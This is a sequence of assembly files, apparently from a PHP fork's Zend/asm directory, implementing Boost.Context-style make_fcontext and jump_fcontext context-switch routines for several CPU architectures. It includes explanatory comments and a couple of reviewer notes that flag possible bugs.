# R5 = function descriptor of the context-function.
.make_fcontext:
# save return address into R6
mflr 6
# first arg of make_fcontext() == top address of context-stack
# shift address in R3 to lower 16 byte boundary
clrrwi 3, 3, 4
# reserve space for context-data on context-stack
# including 32 byte of linkage + parameter area (R1 % 16 == 0)
subi 3, 3, 288
# third arg of make_fcontext() == address of context-function descriptor
# load entry point from the descriptor and save it as PC
lwz 4, 0(5)
stw 4, 240(3)
# save TOC of context-function
lwz 4, 4(5)
stw 4, 20(3)
# set back-chain to zero
li 0, 0
stw 0, 256(3)
# zero in r3 indicates first jump to context-function
# NOTE(review): `std` is a 64-bit store but this file targets PPC32;
# `stw 0, 244(3)` looks intended - verify against the assembler in use.
std 0, 244(3)
# load LR
mflr 0
# jump to label 1
bl .Label
.Label:
# load LR into R4
mflr 4
# compute abs address of label .L_finish
addi 4, 4, .L_finish - .Label
# restore LR
mtlr 0
# save address of finish as return-address for context-function
# will be entered after context-function returns
stw 4, 8(3)
# restore return address from R6
mtlr 6
blr # return pointer to context-data
.L_finish:
# save return address into R0
mflr 0
# save return address on stack, set up stack frame
stw 0, 4(1)
# allocate stack space, R1 % 16 == 0
stwu 1, -16(1)
# exit code is zero
li 3, 0
# exit application
bl ._exit
nop
|
Aidam7/PHavirP
| 5,249
|
Zend/asm/jump_s390x_sysv_elf_gas.S
|
/*******************************************************
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 8 | 16 | 24 | *
* ------------------------------------------------- *
* | t.fctx | t.data | r2 | r6 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 40 | 48 | 56 | *
* ------------------------------------------------- *
* | r7 | r8 | r9 | r10 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 72 | 80 | 88 | *
* ------------------------------------------------- *
* | r11 | r12 | r13 | r14 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 104 | 112 | 120 | *
* ------------------------------------------------- *
* | f8 | f9 | f10 | f11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 136 | 144 | 152 | *
* ------------------------------------------------- *
* | f12 | f13 | f14 | f15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 168 | 176 | | *
* ------------------------------------------------- *
* | fpc | pc | | | *
* ------------------------------------------------- *
*******************************************************/
.text
.align 8
.global jump_fcontext
.type jump_fcontext, @function
/* Offsets into the 176-byte context record laid out on the stack
   (see the diagram above). */
#define ARG_OFFSET 0
#define GR_OFFSET 16
#define FP_OFFSET 96
#define FPC_OFFSET 160
#define PC_OFFSET 168
#define CONTEXT_SIZE 176
#define REG_SAVE_AREA_SIZE 160
/*
typedef void* fcontext_t;
struct transfer_t {
fcontext_t fctx;
void * data;
};
transfer_t jump_fcontext( fcontext_t const to,
void * data);
Incoming args
r2 - Hidden argument to the location where the return transfer_t needs to be returned
r3 - Context we want to switch to
r4 - Data pointer
*/
jump_fcontext:
.machine "z10"
/* Reserve stack space to store the current context. */
aghi %r15,-CONTEXT_SIZE
/* Save the argument register holding the location of the return value. */
stg %r2,GR_OFFSET(%r15)
/* Save the call-saved general purpose registers. */
stmg %r6,%r14,GR_OFFSET+8(%r15)
/* Save call-saved floating point registers. */
std %f8,FP_OFFSET(%r15)
std %f9,FP_OFFSET+8(%r15)
std %f10,FP_OFFSET+16(%r15)
std %f11,FP_OFFSET+24(%r15)
std %f12,FP_OFFSET+32(%r15)
std %f13,FP_OFFSET+40(%r15)
std %f14,FP_OFFSET+48(%r15)
std %f15,FP_OFFSET+56(%r15)
/* Save the return address as current pc. */
stg %r14,PC_OFFSET(%r15)
/* Save the floating point control register. */
stfpc FPC_OFFSET(%r15)
/* Backup the stack pointer pointing to the old context-data into r1. */
lgr %r1,%r15
/* Load the new context pointer as stack pointer. */
lgr %r15,%r3
/* Restore the call-saved GPRs from the new context. */
lmg %r6,%r14,GR_OFFSET+8(%r15)
/* Restore call-saved floating point registers. */
ld %f8,FP_OFFSET(%r15)
ld %f9,FP_OFFSET+8(%r15)
ld %f10,FP_OFFSET+16(%r15)
ld %f11,FP_OFFSET+24(%r15)
ld %f12,FP_OFFSET+32(%r15)
ld %f13,FP_OFFSET+40(%r15)
ld %f14,FP_OFFSET+48(%r15)
ld %f15,FP_OFFSET+56(%r15)
/* Load the floating point control register. */
lfpc FPC_OFFSET(%r15)
/* Restore PC - the location where we will jump to at the end. */
lg %r5,PC_OFFSET(%r15)
/* Load-and-test the saved r2 (hidden return-value pointer).  A context
   freshly created by make_fcontext has 0 here; ltg sets the condition
   code consumed by the jnz below. */
ltg %r2,GR_OFFSET(%r15)
jnz use_return_slot
/* We restore a make_fcontext context. Use the function
argument slot in the context we just saved and allocate the
register save area for the target function. */
la %r2,ARG_OFFSET(%r1)
aghi %r15,-REG_SAVE_AREA_SIZE
use_return_slot:
/* Save the two fields in transfer_t. When calling a
make_fcontext function this becomes the function argument of
the target function, otherwise it will be the return value of
jump_fcontext. */
stg %r1,0(%r2)
stg %r4,8(%r2)
/* Free the restored context. */
aghi %r15,CONTEXT_SIZE
/* Jump to the PC loaded from the new context. */
br %r5
.size jump_fcontext,.-jump_fcontext
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 5,865
|
Zend/asm/jump_ppc64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | R13 | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | FCTX | DATA | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.align 2
.globl _jump_fcontext
_jump_fcontext:
; transfer_t jump_fcontext( fcontext_t const to, void * data)
; r3 = hidden pointer where the returned transfer_t is stored,
; r4 = context to jump to, r5 = data to transfer
; (offsets match the layout diagram above: hidden=152, CR=160, LR=168, PC=176)
; reserve space on stack
subi r1, r1, 184
std r14, 8(r1) ; save R14
std r15, 16(r1) ; save R15
std r16, 24(r1) ; save R16
std r17, 32(r1) ; save R17
std r18, 40(r1) ; save R18
std r19, 48(r1) ; save R19
std r20, 56(r1) ; save R20
std r21, 64(r1) ; save R21
std r22, 72(r1) ; save R22
std r23, 80(r1) ; save R23
std r24, 88(r1) ; save R24
std r25, 96(r1) ; save R25
std r26, 104(r1) ; save R26
std r27, 112(r1) ; save R27
std r28, 120(r1) ; save R28
std r29, 128(r1) ; save R29
std r30, 136(r1) ; save R30
std r31, 144(r1) ; save R31
std r3, 152(r1) ; save hidden
; save CR
mfcr r0
std r0, 160(r1)
; save LR
mflr r0
std r0, 168(r1)
; save LR as PC
std r0, 176(r1)
; store RSP (pointing to context-data) in R6
mr r6, r1
; restore RSP (pointing to context-data) from R4
mr r1, r4
ld r14, 8(r1) ; restore R14
ld r15, 16(r1) ; restore R15
ld r16, 24(r1) ; restore R16
ld r17, 32(r1) ; restore R17
ld r18, 40(r1) ; restore R18
ld r19, 48(r1) ; restore R19
ld r20, 56(r1) ; restore R20
ld r21, 64(r1) ; restore R21
ld r22, 72(r1) ; restore R22
ld r23, 80(r1) ; restore R23
ld r24, 88(r1) ; restore R24
ld r25, 96(r1) ; restore R25
ld r26, 104(r1) ; restore R26
ld r27, 112(r1) ; restore R27
ld r28, 120(r1) ; restore R28
ld r29, 128(r1) ; restore R29
ld r30, 136(r1) ; restore R30
ld r31, 144(r1) ; restore R31
ld r3, 152(r1) ; restore hidden
; restore CR
ld r0, 160(r1)
mtcr r0
; restore LR
ld r0, 168(r1)
mtlr r0
; load PC
ld r12, 176(r1)
; move PC into CTR for the indirect branch below
mtctr r12
; adjust stack
addi r1, r1, 184
; zero in r3 indicates first jump to context-function
cmpdi r3, 0
beq use_entry_arg
; return transfer_t
std r6, 0(r3)
std r5, 8(r3)
; jump to context
bctr
use_entry_arg:
; copy transfer_t into transfer_fn arg registers
mr r3, r6
mr r4, r5
; jump to context
bctr
|
Aidam7/PHavirP
| 4,275
|
Zend/asm/make_i386_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| guard | EDI | ESI | EBX | EBP | EIP | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | | *
* ---------------------------------------------------------------------------------- *
* | hidden | to | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.file "make_i386_sysv_elf_gas.S"
.text
.globl make_fcontext
.align 2
.type make_fcontext,@function
/* fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t) )
   SysV i386: all arguments are on the stack.
   0x4(%esp) = sp (top of the context-stack), 0x8(%esp) = size (not read
   in this routine), 0xc(%esp) = fn.  Returns the context pointer in EAX. */
make_fcontext:
/* first arg of make_fcontext() == top of context-stack */
movl 0x4(%esp), %eax
/* reserve space for first argument of context-function
eax might already point to a 16byte border */
leal -0x8(%eax), %eax
/* shift address in EAX to lower 16 byte boundary */
andl $-16, %eax
/* reserve space for context-data on context-stack, and align the stack */
leal -0x34(%eax), %eax
/* third arg of make_fcontext() == address of context-function */
/* stored in the EBX save slot (offset 0x14 of the layout above) */
movl 0xc(%esp), %ecx
movl %ecx, 0x14(%eax)
/* save MMX control- and status-word */
stmxcsr (%eax)
/* save x87 control-word */
fnstcw 0x4(%eax)
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
/* save stack guard */
movl %gs:0x14, %ecx /* read stack guard from TLS record */
movl %ecx, 0x8(%eax) /* save stack guard */
#endif
/* return transport_t */
/* FCTX == EDI, DATA == ESI */
leal 0xc(%eax), %ecx
movl %ecx, 0x20(%eax)
/* call the next instruction so its return address (the address of
   label 1) lands on the stack -- a PIC way to obtain the current EIP */
call 1f
/* address of trampoline 1 */
1: popl %ecx
/* compute abs address of label trampoline */
addl $trampoline-1b, %ecx
/* save address of trampoline as return address */
/* will be entered after calling jump_fcontext() first time */
movl %ecx, 0x1c(%eax)
/* compute abs address of label finish */
call 2f
/* address of label 2 */
2: popl %ecx
/* compute abs address of label finish */
addl $finish-2b, %ecx
/* save address of finish as return-address for context-function */
/* will be entered after context-function returns */
movl %ecx, 0x18(%eax)
ret /* return pointer to context-data */
trampoline:
/* move transport_t for entering context-function */
movl %edi, (%esp)
movl %esi, 0x4(%esp)
pushl %ebp
/* jump to context-function */
jmp *%ebx
finish:
call 3f
/* address of label 3 */
3: popl %ebx
/* compute address of GOT and store it in EBX */
addl $_GLOBAL_OFFSET_TABLE_+[.-3b], %ebx
/* exit code is zero */
xorl %eax, %eax
movl %eax, (%esp)
/* exit application */
call _exit@PLT
hlt
.size make_fcontext,.-make_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 4,534
|
Zend/asm/jump_mips64_n64_elf_gas.S
|
/*
Copyright Jiaxun Yang 2018.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 8 | 16 | 24 | *
* ------------------------------------------------- *
* | F24 | F25 | F26 | F27 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 40 | 48 | 56 | *
* ------------------------------------------------- *
* | F28 | F29 | F30 | F31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 72 | 80 | 88 | *
* ------------------------------------------------- *
* | S0 | S1 | S2 | S3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | S4 | S5 | S6 | S7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | FP | GP | RA | PC | *
* ------------------------------------------------- *
* *
* *****************************************************/
.file "jump_mips64_n64_elf_gas.S"
.text
.globl jump_fcontext
.align 3
.type jump_fcontext,@function
.ent jump_fcontext
jump_fcontext:
# transfer_t jump_fcontext( fcontext_t const to, void * data)
# n64 ABI: a0 = context to jump to, a1 = data;
# returns fctx in v0 and data in v1
# reserve space on stack
daddiu $sp, $sp, -160
sd $s0, 64($sp) # save S0
sd $s1, 72($sp) # save S1
sd $s2, 80($sp) # save S2
sd $s3, 88($sp) # save S3
sd $s4, 96($sp) # save S4
sd $s5, 104($sp) # save S5
sd $s6, 112($sp) # save S6
sd $s7, 120($sp) # save S7
sd $fp, 128($sp) # save FP
# NOTE(review): the layout above reserves offset 136 for GP, but this
# routine never saves/restores it -- confirm against the upstream file
sd $ra, 144($sp) # save RA
sd $ra, 152($sp) # save RA as PC
#if defined(__mips_hard_float)
s.d $f24, 0($sp) # save F24
s.d $f25, 8($sp) # save F25
s.d $f26, 16($sp) # save F26
s.d $f27, 24($sp) # save F27
s.d $f28, 32($sp) # save F28
s.d $f29, 40($sp) # save F29
s.d $f30, 48($sp) # save F30
s.d $f31, 56($sp) # save F31
#endif
# store SP (pointing to old context-data) in v0 as return
move $v0, $sp
# get SP (pointing to new context-data) from a0 param
move $sp, $a0
#if defined(__mips_hard_float)
l.d $f24, 0($sp) # restore F24
l.d $f25, 8($sp) # restore F25
l.d $f26, 16($sp) # restore F26
l.d $f27, 24($sp) # restore F27
l.d $f28, 32($sp) # restore F28
l.d $f29, 40($sp) # restore F29
l.d $f30, 48($sp) # restore F30
l.d $f31, 56($sp) # restore F31
#endif
ld $s0, 64($sp) # restore S0
ld $s1, 72($sp) # restore S1
ld $s2, 80($sp) # restore S2
ld $s3, 88($sp) # restore S3
ld $s4, 96($sp) # restore S4
ld $s5, 104($sp) # restore S5
ld $s6, 112($sp) # restore S6
ld $s7, 120($sp) # restore S7
ld $fp, 128($sp) # restore FP
ld $ra, 144($sp) # restore RA
# load PC
ld $t9, 152($sp)
# adjust stack
daddiu $sp, $sp, 160
move $a0, $v0 # move old sp from v0 to a0 as param
move $v1, $a1 # move *data from a1 to v1 as return
# jump to context
jr $t9
.end jump_fcontext
.size jump_fcontext, .-jump_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,181
|
Zend/asm/jump_i386_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| EDI | ESI | EBX | EBP | EIP | to | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | | *
* ---------------------------------------------------------------------------------- *
* | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _jump_fcontext
.align 2
_jump_fcontext:
/* transfer_t jump_fcontext( fcontext_t const to, void * data)
   i386 Mach-O: both args on the stack; after the 0x18-byte adjustment
   below they sit at 0x1c(%esp) (to) and 0x20(%esp) (data).
   Returns fctx in EAX and data in EDX. */
leal -0x18(%esp), %esp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%esp) /* save MMX control- and status-word */
fnstcw 0x4(%esp) /* save x87 control-word */
#endif
movl %edi, 0x8(%esp) /* save EDI */
movl %esi, 0xc(%esp) /* save ESI */
movl %ebx, 0x10(%esp) /* save EBX */
movl %ebp, 0x14(%esp) /* save EBP */
/* store ESP (pointing to context-data) in ECX */
movl %esp, %ecx
/* first arg of jump_fcontext() == fcontext to jump to */
movl 0x1c(%esp), %eax
/* second arg of jump_fcontext() == data to be transferred */
movl 0x20(%esp), %edx
/* restore ESP (pointing to context-data) from EAX */
movl %eax, %esp
/* return parent fcontext_t */
movl %ecx, %eax
/* returned data is stored in EDX */
movl 0x18(%esp), %ecx /* restore EIP */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%esp) /* restore MMX control- and status-word */
fldcw 0x4(%esp) /* restore x87 control-word */
#endif
movl 0x8(%esp), %edi /* restore EDI */
movl 0xc(%esp), %esi /* restore ESI */
movl 0x10(%esp), %ebx /* restore EBX */
movl 0x14(%esp), %ebp /* restore EBP */
leal 0x1c(%esp), %esp /* prepare stack */
/* jump to context */
jmp *%ecx
Aidam7/PHavirP
| 3,078
|
Zend/asm/jump_arm_aapcs_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | s16 | s17 | s18 | s19 | s20 | s21 | s22 | s23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | s24 | s25 | s26 | s27 | s28 | s29 | s30 | s31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* |hiddn| v1 | v2 | v3 | v4 | v5 | v6 | v7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | v8 | lr | pc | FCTX| DATA| | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_arm_aapcs_elf_gas.S"
.text
.globl jump_fcontext
.align 2
.type jump_fcontext,%function
.syntax unified
jump_fcontext:
@ transfer_t jump_fcontext( fcontext_t const to, void * data)
@ AAPCS: a1 = hidden pointer where the returned transfer_t is stored,
@ a2 = context to jump to, a3 = data to transfer
@ save LR as PC
push {lr}
@ save hidden,V1-V8,LR
push {a1,v1-v8,lr}
@ prepare stack for FPU
sub sp, sp, #64
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ save S16-S31
vstmia sp, {d8-d15}
#endif
@ store RSP (pointing to context-data) in A1
mov a1, sp
@ restore RSP (pointing to context-data) from A2
mov sp, a2
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ restore S16-S31
vldmia sp, {d8-d15}
#endif
@ prepare stack for FPU
add sp, sp, #64
@ restore hidden (into A4),V1-V8,LR
pop {a4,v1-v8,lr}
@ return transfer_t from jump
str a1, [a4, #0]
str a3, [a4, #4]
@ pass transfer_t as first arg in context function
@ A1 == FCTX, A2 == DATA
mov a2, a3
@ restore PC
pop {pc}
.size jump_fcontext,.-jump_fcontext
@ Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,191
|
Zend/asm/jump_arm_aapcs_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | s16 | s17 | s18 | s19 | s20 | s21 | s22 | s23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | s24 | s25 | s26 | s27 | s28 | s29 | s30 | s31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | sjlj|hiddn| v1 | v2 | v3 | v4 | v5 | v6 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | v7 | v8 | lr | pc | FCTX| DATA| | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.globl _jump_fcontext
.align 2
_jump_fcontext:
@ transfer_t jump_fcontext( fcontext_t const to, void * data)
@ AAPCS: a1 = hidden pointer where the returned transfer_t is stored,
@ a2 = context to jump to, a3 = data to transfer
@ save LR as PC
push {lr}
@ save hidden,V1-V8,LR
push {a1,v1-v8,lr}
@ locate TLS to save/restore SjLj handler
mrc p15, 0, v2, c13, c0, #3
bic v2, v2, #3
@ load TLS[__PTK_LIBC_DYLD_Unwind_SjLj_Key]
ldr v1, [v2, #72]
@ save SjLj handler
push {v1}
@ prepare stack for FPU
sub sp, sp, #64
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ save S16-S31
vstmia sp, {d8-d15}
#endif
@ store RSP (pointing to context-data) in A1
mov a1, sp
@ restore RSP (pointing to context-data) from A2
mov sp, a2
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ restore S16-S31
vldmia sp, {d8-d15}
#endif
@ prepare stack for FPU
add sp, sp, #64
@ restore SjLj handler
pop {v1}
@ store SjLj handler in TLS
str v1, [v2, #72]
@ restore hidden (into A4),V1-V8,LR
pop {a4,v1-v8,lr}
@ return transfer_t from jump
str a1, [a4, #0]
str a3, [a4, #4]
@ pass transfer_t as first arg in context function
@ A1 == FCTX, A2 == DATA
mov a2, a3
@ restore PC
pop {pc}
|
Aidam7/PHavirP
| 5,289
|
Zend/asm/make_ppc64_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_ppc64_sysv_xcoff_gas.S"
.toc
.csect .text[PR], 5
.align 2
.globl make_fcontext[DS]
.globl .make_fcontext
.csect make_fcontext[DS], 3
make_fcontext:
.llong .make_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
.make_fcontext:
# fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t) )
# R3 = top of the context-stack, R4 = stack size (not read in this routine),
# R5 = function descriptor of the context-function
# save return address into R6
mflr 6
# first arg of make_fcontext() == top of context-stack
# shift address in R3 to lower 16 byte boundary
clrrdi 3, 3, 4
# reserve space for context-data on context-stack
# including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi 3, 3, 248
# third arg of make_fcontext() == address of context-function descriptor
ld 4, 0(5)
std 4, 176(3)
# save TOC of context-function
ld 4, 8(5)
std 4, 0(3)
